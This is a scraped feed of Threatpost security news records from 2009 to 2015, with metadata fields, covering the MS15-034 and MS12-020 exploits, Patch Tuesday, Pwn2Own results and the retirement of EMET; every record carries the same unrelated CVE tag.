server,\u201d Ullrich said. \u201cThis is the main exposure right now.\u201d\n\nWhile IIS, or Internet Information Services servers, are the principal attack vector right now, this isn\u2019t necessarily solely an IIS problem. 
Lots of services make use of HTTP.sys.\n\n\u201cIt\u2019s really not an IIS vulnerability, but it is exposed via IIS,\u201d Ullrich said. \u201cThe HTTP.sys vulnerability: Every Windows system has it whether it\u2019s running IIS or not. It\u2019s a system library that implements the parsing of http requests and implements caching content in kernel memory.\u201d\n\nOne of Microsoft\u2019s workarounds, for example, was to disable IIS kernel caching, but there is a gotcha.\n\n\u201cTurning off kernel caching will prevent the exploit. The system is only vulnerable if kernel caching is turned on,\u201d Ullrich said. \u201cHowever, it will cause a significant loss in performance, so this may then turn into a denial of service for a busy site as it can no longer fulfill all requests.\u201d\n\nThe crux of the vulnerability lies in the range header, which extracts portions of webpages from kernel memory and passes them to the client. A [specifically crafted range header](<http://blog.didierstevens.com/2015/04/17/ms15-034-detection-some-observations/>) will trigger the denial-of-service vulnerability so long as certain conditions are met within the range. This has the potential to be quite disruptive, despite the vast majority of webservers being Linux boxes (70 million Windows servers could be affected according to [Netcraft](<http://news.netcraft.com/archives/2015/04/16/critical-windows-vulnerability-affects-at-least-70-million-websites.html>)).\n\nThe information disclosure weakness is concerning as well because there are ways to get a kernel memory dump back in a response from HTTP.sys. This will evoke memories of Heartbleed, which also led to memory leakage and inevitably a slew of exploits with varying results. Ullrich said that memory disclosure in this case, however, is trickier to retrieve than with Heartbleed, but it could be used to inch closer to remote code execution.\n\n\u201cCurrently, there is no known exploit that would cause remote code execution. 
Likely, an attacker would first have to use the information disclosure vulnerability to learn more about the internal memory layout to then follow up with a remote code execution exploit,\u201d he said. \u201cBut since the information disclosure attack will also cause a reboot, this information may not be all that valuable.\u201d\n\n_This article was updated at 1 p.m. ET with a comment from Microsoft._\n", "cvss3": {}, "published": "2015-04-17T11:06:54", "type": "threatpost", "title": "Active DoS Exploits for MS15-034 Under Way", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-04-21T14:51:48", "id": "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "href": "https://threatpost.com/active-dos-exploits-for-ms15-034-under-way/112314/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:32", "description": "There is a confirmed legitimate working exploit for the [MS12-020 RDP vulnerability](<https://threatpost.com/microsoft-fixes-critical-rdp-vulnerability-march-patch-tuesday-031312/>) in Windows circulating already and researchers say it is capable of either crashing or causing a denial-of-service condition on vulnerable machines. Microsoft has warned customers about the possibility of the exploit surfacing quickly and advised them to patch the flaw immediately. The researcher who discovered the vulnerability said that the packet he included in his original advisory was found in the exploit, raising the specter of a data leak somewhere in the pipeline.\n\nThe exploit surfaced on a Chinese download site in the last couple of days and researchers have been able to confirm that it causes a blue screen of death on some systems and a DoS condition on other versions of Windows. 
Experts have said that the RDP bug, which was discovered by Luigi Auriemma, has the potential to be used as the basis for a large-scale worm and the existence of a working exploit is the first step down that road. The exploit will produce a BSOD on Windows 7 and a DoS on Windows XP.\n\nThe security research community was buzzing on Friday morning with the news that the exploit from the Chinese site contained an exact copy of the information Microsoft sent out to the members of its Microsoft Active Protection Program (MAPP). That program grants early access to vulnerability and patch information to a select, vetted group of security and antimalware companies, allowing them to prepare defenses for the bugs that Microsoft will patch each month. When the MAPP program began four years ago, Microsoft said that it would take precautions to guard against the possibility of a leak of that valuable information, but didn\u2019t spell out what those measures might be.\n\n\u201cThe amount of time between the release of a patch and the release of the exploit code [for that patch] continues to shorten and customers have been asking for information to react to this,\u201d Mike Reavey of the Microsoft Security Response Center told Threatpost editor [Ryan Naraine in 2008](<http://www.zdnet.com/blog/security/microsoft-makes-daring-vulnerability-sharing-move/1646>).\n\n* * *\n\n**Listen** Digital Underground podcast: Ryan Naraine on Exploit Mitigations and the MS12-020 RDP Bug <https://media.threatpost.com/wp-content/uploads/sites/103/2012/03/07052334/digital_underground_95.mp3>\n\n* * *\n\nThat window now appears to be as small as ever. Microsoft released its patch on Tuesday and the exploit code was found on the Chinese site that same day. MAPP members get the data on soon-to-be-patched flaws a day or more before the patches are released to the public. 
This month, the MAPP info went out about 24 hours before the patch release.\n\nMicrosoft officials were unavailable for comment on Friday morning.\n\nAuriemma said that the exploit code found on the Chinese site contains the exact packet that he sent to TippingPoint\u2019s Zero Day Initiative in his original advisory on the vulnerability. ZDI engineers typically confirm the bug, work up a protection signature for TippingPoint\u2019s appliances and then send the data on to the affected company, in this case Microsoft.\n\n\u201cThe packet stored in the \u2018chinese\u2019 rdpclient.exe PoC is the EXACT ONE I gave to ZDI!!! [@thezdi](<http://twitter.com/thezdi>)? [@microsoft](<http://twitter.com/microsoft>)? who leaked?,\u201d [Auriemma said in a message on Twitter](<http://twitter.com/#%21/luigi_auriemma/statuses/180530223366938624>) early Friday.\n\nIn an email interview, Auriemma said he had no doubts that the code in the exploit was his and that the code leak came from Microsoft.\n\n\u201cThe packet I gave to ZDI was unique because I modified it by hand. There are no doubts on this thing,\u201d he said. \u201cMicrosoft is the source of the leak, probably during the distribution to MAPP partners, but I still have some doubts.\u201d\n\nIn addition to the code from Auriemma, researchers said that there was additional information in the exploit found on the Chinese site that was only available to MAPP members. 
One researcher said that he was positive that there had been a leak somewhere along the chain, but wasn\u2019t sure where it had occurred.\n\nAuriemma [said on his Web site](<http://aluigi.org/>) that once he discovered that the proof-of-concept code that was available contained his packet, he decided to release his original advisory with the full information in it.\n\n\u201cNow that my proof-of-concept is out (yeah rdpclient.exe is the poc written by Microsoft in November 2011 using the example packet I sent to ZDI) I have decided to release my original advisory and proof-of-concept packet written the 16 May 2011,\u201d he said.\n\n_Note: Kaspersky Lab is a member of the MAPP program, but Threatpost editors do not have access to the MAPP data provided by Microsoft._\n", "cvss3": {}, "published": "2012-03-16T12:20:26", "type": "threatpost", "title": "MS12-020 RDP Exploit Found, Researchers Say Code May Have Leaked From Security Vendor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:31:06", "id": "THREATPOST:2AFE9BC25DD41D9CF073C8C04B0B1879", "href": "https://threatpost.com/ms12-020-rdp-exploit-found-researchers-say-code-may-have-leaked-security-vendor-031612/76336/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:26", "description": "Unless thousands of companies still using Windows XP SP2 computers suddenly stop procrastinating, hackers are going to be in seventh heaven come July 13. [Read the full article](<http://lastwatchdog.com/hackers-nirvana-horizon-microsofts-ends-patching/>). 
[The Last Watchdog]\n", "cvss3": {}, "published": "2010-07-12T18:06:21", "type": "threatpost", "title": "XP SP2 Will Soon Be Hacker's Candy Store", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:25:36", "id": "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "href": "https://threatpost.com/xp-sp2-will-soon-be-hackers-candy-store-071210/74200/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:04", "description": "Microsoft announced today it is suing Britain\u2019s second-largest electronics retailer Comet for allegedly creating and selling more than 94,000 back-up discs of its Windows Vista and Windows XP product.\n\nComet Group PLC allegedly produced counterfeit versions of the software in a factory in Hampshire before selling them in dozens of storefronts for \u00a314.99 each (roughly $23) across the U.K.\n\n\u201cComet\u2019s actions were unfair to customers. 
We expect better from retailers of Microsoft products \u2013 and our customers deserve better, too,\u201d said David Finn, associate general counsel for Microsoft\u2019s Worldwide Anti-Piracy and Anti-Counterfeiting division in a [press release issued today](<http://www.microsoft.com/Presspass/press/2012/jan12/01-04CometPR.mspx?rss_fdn=Press%20Releases>).\n\nAccording to a report in [The Guardian](<http://www.guardian.co.uk/technology/2012/jan/04/microsoft-sue-comet-windows-discs>), Comet sold the discs between March 2008 and December 2009 and potentially made the company more than \u00a31.4 million, or $2.2 million.\n\nComet plans to contest Microsoft\u2019s claim, reasoning that in producing the discs, they acted in the best interests of their customers and according to a [statement posted to their site](<http://press.comet.co.uk/index.php?cID=330&cType=news>) \u201cdid not infringe Microsoft\u2019s intellectual property.\u201d\n\nWhile it\u2019s currently owned by French company Kesa Electricals PLC, Comet is said to be in the process of being sold to a private investment partnership led by OpCapita LLP.\n", "cvss3": {}, "published": "2012-01-04T20:41:33", "type": "threatpost", "title": "Microsoft Sues British Electronic Dealer in Alleged Counterfeit Scam", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:03", "id": "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "href": "https://threatpost.com/microsoft-sues-british-electronic-dealer-alleged-counterfeit-scam-010412/76059/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:47", "description": "Ryan Smith, one of the researchers who found the bug in the Microsoft MsVidCtl DLL that the vendor is rushing to patch this week, has posted a [short video 
demonstration](<http://www.hustlelabs.com/bh2009preview/>) of a technique that bypasses the stop-gap solution of preventing the vulnerable ActiveX control from loading.\n\nIn the demo, Smith, a former researcher with IBM ISS who will be giving a talk on the exploit at the Black Hat conference later this week with Mark Dowd and David Dewey, shows that setting the killbit on the vulnerable control, as Microsoft and others suggested, is not sufficient to prevent exploitation. The demo shows Smith using a new tool called Killbit Visualizer to log the IDs of killbits that are specifically allowed or denied.\n\nHe is then able to get around the killbit protection on the vulnerable video control and cause the calculator to start on the machine.\n\nSmith\u2019s demo comes on the heels of a [blog post by Halvar Flake](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>), a well-known security researcher, who pointed out nearly three weeks ago that simply setting the killbit was not going to protect users against the MsVidCtl flaw. From his post:\n\nSo, where does this leave us?\n\n 1. The bug is actually much \u201cdeeper\u201d than most people realize.\n\n 2. The killbit-fix is clearly insufficient, as there are bound to be many other ways of triggering the issue.\n\n 3. The bug might have weaseled its way into third-party components, IF anyone outside of Microsoft had access to the broken ATL versions.\n\n 4. If this has happened, MS might have accidentally introduced security vulnerabilities into third-party products.\n\n 5. Depending on the optimization settings applied to the executables, it might require a bit of an effort to find out whether a vulnerable or non-vulnerable version of the code is present.\n\n 6. There might be a lot of recompiling next week.\n\n 7. 
IF this has gotten into third-party-products, I would bet that only a tiny fraction of software vendors will push out proper/timely updates.\n\nMicrosoft is rushing out an [emergency patch for the vulnerability](<https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/>) on Tuesday.\n", "cvss3": {}, "published": "2009-07-27T15:29:15", "type": "threatpost", "title": "Researcher Shows Killbit is No Defense on MsVidCtl Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:45", "id": "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "href": "https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/73016/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:39", "description": "Microsoft issued nine bulletins fixing 16 vulnerabilities in the July 2012 edition of Patch Tuesday. Three of the bulletins received Microsoft\u2019s most severe \u2018critical\u2019 rating, while the remaining six were deemed merely \u2018important.\u2019\n\nFirst and foremost among the critical patches is [MS12-043](<http://go.microsoft.com/fwlink/?LinkID=254824>), a fix for the publicly disclosed and widely publicized XML core services vulnerability that was [actively exploited last month](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>). Affecting Microsoft Windows, Office, Developer Tools and Server Software, it allowed attackers to execute code remotely after tricking victims into visiting a malicious website in Internet Explorer.\n\n[MS12-044](<http://go.microsoft.com/fwlink/?LinkId=254377>), also critical, is a cumulative security update for Internet Explorer resolving two privately reported bugs that, if unpatched, could allow an attacker to remotely execute code if a user visits a specially crafted webpage using Internet Explorer. 
Successful exploitation could grant the attacker the same rights as the logged-on user, which, as always, will be more troublesome for users who operate with administrative rights.\n\nThe final critical bulletin, [MS12-045](<http://go.microsoft.com/fwlink/?LinkId=254441>), resolves one privately disclosed vulnerability in the data access components of Windows. Like the previous bulletin, this could potentially lead to remote code execution if the user visits a specially crafted website and allow the attacker to gain the same user rights as the current user.\n\nThe remaining \u2018important\u2019 bulletins resolve 12 vulnerabilities altogether, specifically, one bug in Visual Basic for Applications and another in the Windows Shell that could allow for remote code execution. The fix also covers two elevation of privilege vulnerabilities in Windows Kernel-Mode Drivers, six in SharePoint, and one more in Office for Mac, in addition to an information disclosure bug in TLS.\n\nYou can find the entire TechNet announcement [here](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jul>).\n", "cvss3": {}, "published": "2012-07-10T19:23:26", "type": "threatpost", "title": "Three Critical Fixes in July Microsoft Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:28", "id": "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "href": "https://threatpost.com/three-critical-fixes-july-microsoft-patch-tuesday-071012/76785/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:12", "description": "VANCOUVER \u2013 Successful exploits at the Pwn2Own contest get all the glitz, but the rarities are the exploits that fail.\n\nA group of four young South Korean hackers from ASRT, all of them well shy of their thirtieth birthdays, stood in proxy for Jung Hoon Lee. 
Lee was home fulfilling a military obligation, a promise that kept him from seeing his Internet Explorer 11 exploit come up short Thursday morning.\n\nHP\u2019s Zero Day Initiative, sponsors of the event, said they bought the vulnerability regardless, and worked with the researchers on breaking down the details. The particulars would also be shared with Microsoft, as is customary for all bugs purchased by ZDI, which passes them on to the affected vendors.\n\nRegistrants at Pwn2Own have 30 minutes to demonstrate their exploit and verify it works by executing the calculator application on the underlying system. In this case, Lee\u2019s exploit was chasing down a vulnerability in IE 11 on a fully patched 64-bit Windows 8.1 machine. A successful exploit would have been worth $100,000.\n\nGenerally, entrants in Pwn2Own withdraw if there are difficulties with their exploits. On Tuesday, Microsoft rolled out another patch for Internet Explorer. The cumulative rollup, a regular Patch Tuesday update, repaired a zero-day in Internet Explorer 10 being used in targeted attacks, including Operation SnowMan targeting the U.S. Veterans of Foreign Wars and a separate attack on a French aerospace manufacturer. It was not disclosed whether the patch affected the Lee exploit.\n\nThe failure of Lee\u2019s exploit was in stark contrast to others demonstrated to that point, including one by German researcher Sebastian Apelt of Siberas who succeeded against IE 11. Apelt\u2019s exploit worked in less than a minute and was good for $100,000. Earlier on Thursday, a pair of Chinese hackers from the Keen Team successfully exploited a zero-day vulnerability in Apple\u2019s Safari browser to gain control of a Macbook running OS X Mavericks. That exploit was worth $65,000 and the members of Keen Team announced they would donate a portion of that to Malaysian charities.\n\nSoon after the IE setback, Pwn2Own regular George Hotz took down Firefox to collect a $50,000 prize. 
Hotz is perhaps better known for his jailbreaking exploits against the iPhone and the PlayStation gaming console. Hotz\u2019s attack against Firefox was the fourth time zero-days were exploited in the Mozilla browser during the two-day event.\n\nHackers from French exploit vendor Vupen took down both Internet Explorer and Firefox on Wednesday as part of a $350,000 haul. Vupen also beat Adobe Reader and Flash. On Thursday, Vupen had another exploit for Chrome worth another $100,000. Once the Keen Team popped Safari today, Vupen withdrew its Safari bug. It also withdrew its Java entry on Wednesday.\n\nVupen founder Chaouki Bekrar said his researchers prepared for Pwn2Own two months in advance and had little trouble with IE 11 yesterday, using a use-after-free vulnerability combined with an \u201cobject confusion\u201d to bypass the IE sandbox.\n\n\u201cIt\u2019s definitely getting harder to exploit browsers, especially on Windows 8.1,\u201d Bekrar said. \u201cExploitation is harder and finding zero-days in browsers is harder.\u201d\n\nVupen\u2019s successful exploit of Firefox on Wednesday also took advantage of a different use-after-free zero day to bypass ASLR and DEP memory protections in Windows. Bekrar said the bug was found through the use of fuzzers against 60 million test cases.\n\n\u201cThat proves Firefox has done a great job fixing flaws; the same for Chrome,\u201d Bekrar said. 
\u201cChrome has the strongest sandbox, so that\u2019s even more difficult to create exploits for.\u201d\n\nZDI announced prior to the event it would buy all the Pwn2Own bugs at a price of close to $1.1 million.\n", "cvss3": {}, "published": "2014-03-13T19:33:53", "type": "threatpost", "title": "IE 11 Stands Up to Pwn2Own Exploit Attempt", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-13T23:33:53", "id": "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "href": "https://threatpost.com/ie-11-stands-up-to-pwn2own-exploit-attempt/104786/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:23", "description": "Today is Patch Tuesday, the 11-year-old procession of security bulletins from Microsoft streamed out automatically to consumers of Windows Update, and pulled en masse by enterprise admins worldwide needing to test each for compatibility.\n\nThis is how it\u2019s been done since shortly after Bill Gates\u2019 Trustworthy Computing memo in 2002 set Microsoft on its course of secure software development. But in 2015, as the concept approaches adolescence, are we asking the right questions about the viability of a scheduled patch delivery?\n\nSure, enterprises may be ingrained in this rote consumption of security fixes on the second Tuesday of every month, but given that Microsoft is in the middle of a personality overhaul under new CEO Satya Nadella with a vigorous focus on the cloud, and the company\u2019s [vaunted Trustworthy Computing group disbanded as a single entity](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and migrated into several business units inside Microsoft, Patch Tuesday may be showing some signs of cracking.\n\nOutside forces aren\u2019t helping much. 
Zero days dominate the headlines, but affect relatively few until attacks find their way into exploit kits, turning specialized hacks into commodity danger. Google\u2019s Project Zero is the most recent conspirator undermining the value of regular patching cycles; the research team has put vendors on notice that a [90-day countdown](<http://threatpost.com/round-2-google-deadline-closes-on-pair-of-microsoft-vulnerabilities/110474>) starts the second a vulnerability is reported to Microsoft\u2014or any vendor for that matter. And once the 90 days are up, disclosure is full and angst is high.\n\n**Patch Quality in Crosshairs**\n\nInternally, since TWC in September was integrated into Microsoft\u2019s cloud and enterprise group\u2014coinciding with more than 2,100 layoffs, including several key security people\u2014eyebrows have also been raised about patch quality and timeliness. Most notably, a critical vulnerability in Microsoft\u2019s sChannel, the SSL/TLS implementation in Windows, was patched in November but within days, the patch was pulled back because of [issues with TLS negotiations](<http://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385>). It was re-issued in short order, but coincidentally or not, the situation did not endear anyone to the reorg going on in Redmond.\n\nEven going into today\u2019s Patch Tuesday release, a critical [cross-site scripting vulnerability in Internet Explorer affecting Windows 7 and 8.1](<http://threatpost.com/xss-vulnerability-in-ie-could-lead-to-phishing-attacks/110854>) users, made public last week along with proof-of-concept code, is still unpatched, and Microsoft has been silent on when a fix is coming. That silence could, in part, be due to the fact that the company recently [discontinued providing users with advanced notification of patches](<http://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294>), making them available only to premier support customers. 
Perhaps security will stop being a marketing differentiator for Microsoft.\n\n\u201cThey\u2019re not going to get rid of security, but like Apple, put it more behind the scenes,\u201d said Marc Maiffret, a longtime Windows bug-hunter and current CTO at BeyondTrust. \u201cIt\u2019s not going to be the thing they talk about most. It distracts from them being a software and technology company.\u201d\n\nMicrosoft\u2019s QA testing of patches is extensive and reportedly separate from the Microsoft Security Response Center (MSRC) and TWC, which focuses on security research, threat modeling and risk management. Updates are tested against a variety of application and operating system environments for compatibility issues and must meet strict deadlines to be included in Windows Update in a timely fashion. Patches are also tested against third-party applications, and Microsoft will insist that patch quality issues have little to do with TWC changes and more to do with advanced and changing threats.\n\n\u201cMicrosoft carefully reviews and tests each security update to ensure its quality and that it has been thoroughly evaluated for application compatibility. There are many factors that can impact the length of testing,\u201d said Chris Betz of the MSRC in a statement provided to Threatpost. \u201cOnce the update is built, it must be tested with the different operating systems and applications it affects, then localized for the different markets and languages around the world. In some instances, multiple vendors are affected by the same or similar issues, which requires a coordinated release.\u201d\n\nMicrosoft\u2019s focus on delivering a consistent schedule of patches helps users inside the enterprise and smaller organizations line up their deck chairs, do compatibility testing and control patch rollouts. 
These processes are finely tuned compared to a decade ago, and most organizations would not trade Patch Tuesday for, say, automatic silent patching a la Google\u2019s updates to Chrome, experts said.\n\n\u201cThe bigger factor that surrounds things like Patch Tuesday is that threats have changed,\u201d Maiffret said. \u201cOrganizations like governments or anyone who is a high-value target, has a good chance of getting hit with a zero day, which Patch Tuesday has no bearing on, at least up front. That\u2019s a big part of it: security moving away from the value of one individual vulnerability.\u201d\n\n**Automatic Patching Has Its Place**\n\nMicrosoft, for its part, has not been stagnant with patching. New services such as [myBulletins](<http://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339>) and a revamped Exploitability Index help customers make deployment decisions, while its partner programs such as Microsoft Active Protections Program give participating enterprises and vendors a heads-up on vulnerability details in order to coordinate patch delivery with interdependent products.\n\n\u201cEach customer is unique with varying needs based on their technology environments. With the evolution of cloud computing, more and more customers are taking advantage of the real time updates we provide,\u201d said Betz. \u201cCustomers are also increasingly taking advantage of Microsoft Update to automatically provide updates.\u201d\n\nAttackers, however, have the luxury of being able to focus on one bug, but defenders have to look at the biggest risks to their respective environments, hoping they make the right assessments and prioritizations. And this goes well beyond Microsoft to third-party applications such as Flash, Java and others that run everywhere and have been providing attackers with much more tempting targets of late. 
Yet with the world primarily still running on Windows, especially in smaller organizations, patch quality still gives people pause with regard to going to an automated process.\n\n\u201cI think people would like to be in automatic mode. There\u2019s a huge value to set-it-and-forget-it, but there\u2019s still a risk involved and it\u2019s difficult for people to consume that risk not knowing what could happen,\u201d said Andrew Storms, vice president of security services at New Context, and former security executive at CloudPassage and nCircle. \u201cLarge enterprises are always slower moving to the adoption of new concepts and risk, especially with IT. The argument for the other side is what if I could cut a third of my patching costs if I don\u2019t have to patch all the time; if I were a CIO, I would be drooling.\u201d\n\nThat, of course, depends on patches that are good to go out of the box, so to speak.\n\n\u201cAny business at the scale of Google or Microsoft have so many complexities that there are going to be unforeseen interactions,\u201d said Tripwire security researcher Craig Young. \u201cThat\u2019s why enterprises test patches in a controlled environment to make sure they don\u2019t breach critical business applications before rolling them out to systems. That works. The Chrome model is probably not appropriate if you\u2019re a hospital where all your terminals need a web app interface with insurance providers and if Microsoft updates IE and the web app no longer renders properly, how would you address that situation?\u201d\n\n**Environment to Dictate Patching Styles**\n\nKatie Moussouris, a former lead security strategist at Microsoft and current chief policy officer at HackerOne, was deeply involved in the development of Microsoft\u2019s coordinated disclosure program and developing strong relationships with vulnerability researchers and brokers. She says vendors need to sharpen patch development where quality and speed go hand in hand. 
This takes on more relevance with the so-called Internet of Things, where embedded computers often don\u2019t have simple patching mechanisms yet play critical roles in manufacturing, health care and personal environments.\n\n\u201cPatching style is something that definitely has to evolve as what makes up the bulk of internet traffic starts changing,\u201d Moussouris said. \u201cMobile devices are difficult to patch, and are not patched on anyone\u2019s schedule. Many are not designed to be patched either; they\u2019re designed to be upgraded or thrown away in two years.\u201d\n\nMicrosoft, meanwhile, has taken steps to [make exploitation more difficult for attackers](<http://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876>). The introduction of memory corruption mitigations such as ASLR and DEP into Windows and Internet Explorer has made buffer overflow vulnerabilities less of a hassle than a decade ago. Free tools such as the [Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) are often a stopgap for zero-day vulnerabilities until Microsoft can release a scheduled or out-of-band security bulletin.\n\n\u201cMicrosoft has focused on a higher level of mitigations, knowing how high to raise the bar to make exploitation really hard,\u201d Maiffret said. \u201cI hope they keep their eye on mitigations, not just EMET but also the underlying operating system.\u201d\n\nFor the time being, Microsoft won\u2019t retire Patch Tuesday and its high-paying enterprise customers likely won\u2019t let them. And in the end, Patch Tuesday is still relevant on many fronts, and the processes are still superior to many third-party patching processes.\n\n\u201cStepping back, you have to ask: \u2018What\u2019s the relevance of Microsoft vulnerabilities in attacks and exploits?\u2019\u201d Maiffret said. 
\u201cMicrosoft software is still relevant and part of targeted attacks; you still see IE targeted attacks happening, but at the same time, you\u2019re seeing an increase of third-party apps in targeted attacks. That\u2019s the biggest shift. Microsoft is slightly putting security in the back seat, not doing less internally, but in visibility. That mirrors what\u2019s happening from the attackers\u2019 perspective; it\u2019s just as important to find a Flash or Java vulnerability versus a Microsoft vulnerability.\u201d\n", "cvss3": {}, "published": "2015-02-10T09:00:49", "type": "threatpost", "title": "Creaking Patch Tuesday's Viability Rests with Quality, Speed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-11T12:02:27", "id": "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "href": "https://threatpost.com/creaking-patch-tuesdays-viability-rests-with-quality-speed/110941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:29", "description": "Microsoft last week extended the end-of-life expiration date to July 2018 on its exploit mitigation add-on, the Enhanced Mitigation Experience Toolkit (EMET). But for some time, the once-useful tool has been well on its way out to pasture.\n\nWhile EMET was never meant to be anything more than stopgap protection against exploits, attackers and white-hat researchers accelerated its demise with a number of publicized [bypass attacks](<https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/>). That situation, plus Microsoft\u2019s urgency to have users migrate to Windows 10 and the array of new memory mitigations included in the latest OS has brought the curtain down on EMET.\n\n\u201cIt was a stopgap. It was never supposed to be something [Microsoft] wanted people to use longterm,\u201d said Cody Pierce, director of vulnerability research at Endgame. 
\u201cThey want people to upgrade Windows 10; for the good of their customers, they want to transition them to Windows 10 where there are some protections baked into the operating system.\u201d\n\nForemost is Control Flow Guard, a technology built to counter memory-corruption vulnerabilities, which has been available since Visual Studio 2015 and is also built into Windows 10 and Windows 8.1. [Control Flow Guard](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) is thought to be a primary impediment to [use-after-free attacks](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>), which became a favorite exploit once ASLR and DEP put a damper on buffer overflow attacks.\n\n\u201cThere are a lot more compile time mitigations [in Windows 10] like Control Flow Guard, and a new Return Flow Guard feature,\u201d said Darren Kemp, security researcher with Duo Security. Kemp also pointed out that since Windows 10\u2019s mitigations are integrated into the operating system, unlike EMET, there are fewer instances where users will notice a performance hit, which was increasingly common with EMET. Also, EMET required close care when configuring it to work; otherwise it could break certain application processes.\n\n\u201cSince it\u2019s not integrated, you don\u2019t get the same type of tight coupling,\u201d Kemp said. \u201cWith a lot of stuff in EMET, you have to test the software you\u2019re applying it to, to make sure the mitigations don\u2019t cause problems. It hooks into functions and injects features. If software does non-standard things, it can cause problems with those apps.\u201d\n\nMicrosoft, meanwhile, has not had EMET on a consistent upgrade path since version 5.0 dropped in 2014. This was an abrupt change from the early days when EMET was introduced and exploits were unleashed within days of Patch Tuesday releases. 
In announcing the deadline extension to July 31, 2018, Microsoft\u2019s Jeffrey Sutherland acknowledged EMET\u2019s limitations against modern advanced attacks, its performance and reliability shortcomings, and urged users toward Windows 10, which makes the most of hardware virtualization to sandbox applications and links before they can harm the operating system.\n\n\u201cWith the types of threats enterprises face today, we are constantly reminded of this simple truth: modern defense against software vulnerabilities requires a modern platform,\u201d Sutherland said.\n\nThe true value of any mitigation continues to be how well it raises the cost of attacks. Pierce illustrated how advanced attackers have blown well past EMET\u2019s [menu of mitigations](<https://technet.microsoft.com/en-us/security/jj653751>) with advanced logic that automates many facets of an attack that its defenses cannot keep up with.\n\n\u201cIf you\u2019re an exploit kit writer and you acquire a zero day or develop an exploit, you have to get the most bang for your buck; and part of that is supporting a wide range of targets. If you\u2019ve got a Flash exploit, you want it to work on Firefox, Windows, Linux and more and you have to come up with ways to make it easier on you,\u201d Pierce said. \u201cA lot of the ways they\u2019ve figured out to do that bypasses a lot of these late-hook defenses like EMET. They\u2019re getting more value out of it. The types of exploit mitigations EMET provides were limited in utility due to the nature of exploitation. If you look at an exploit kit from 2010, it looks wildly different than it does now.\u201d\n\nDuo\u2019s Kemp, meanwhile, says Windows 10 is one of the hardest targets to breach today.\n\n\u201cThat\u2019s the nature of this stuff: raising the bar. 
